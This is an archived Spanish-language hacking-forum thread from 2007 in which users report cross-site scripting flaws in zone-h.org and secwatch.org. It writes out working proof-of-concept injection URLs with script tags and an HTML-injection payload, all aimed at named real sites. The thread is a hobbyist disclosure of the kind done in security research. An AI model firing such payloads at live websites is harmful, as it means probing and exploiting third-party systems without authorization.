Imprimir Página - XSS en Zone-H

Título: XSS en Zone-H
Publicado por: WHK en 27 Octubre 2007, 16:53 PM

Encontré un XSS en zone-h :P ...muy curioso no?

http://www.zone-h.org/index.php?searchword=`´';}"></script><script>alert(/xss/);</script>&option=com_search&Itemid=5

Lo puse en xssed haber si lo ven antes que lo reparen y despues les aviso.

Por lo que vi hay muchos otros descubierto por otras personas... ya no me dan ganas de usar joomla jajajja.

Título: Re: XSS en Zone-H
Publicado por: yeikos en 29 Octubre 2007, 23:44 PM

Citarhttp://secwatch.org/advisories/1019243/

Título: Re: XSS en Zone-H
Publicado por: WHK en 30 Octubre 2007, 02:16 AM

Juazz

Código [Seleccionar]

http://secwatch.org/?page=contact&name=a"><script>alert(/xss/);</script>

Además que raro cada ves que cambias pone una imagen diferente segun lo que escribas:

Código [Seleccionar]


http://secwatch.org/account/?mode=newsletter&email=plop@tu.yossssssss'%22%3E%3Ch1%3Elol
http://secwatch.org/account/?mode=newsletter&email=holaaaaaaaa

Título: Re: XSS en Zone-H
Publicado por: Man-In-the-Middle en 30 Octubre 2007, 02:25 AM

jajajaj XD!!, que no aprende ehh, que pasoo whk, no se te ve por el msn??

Título: Re: XSS en Zone-H
Publicado por: WHK en 30 Octubre 2007, 02:29 AM

:xD weee te bajaron el rango jajajajjaja ...ahi te veo :P Salu2

Test Foro de elhacker.net SMF 2.1

Seguridad Informática => Bugs y Exploits => Hacking => Nivel Web => Mensaje iniciado por: WHK en 27 Octubre 2007, 16:53 PM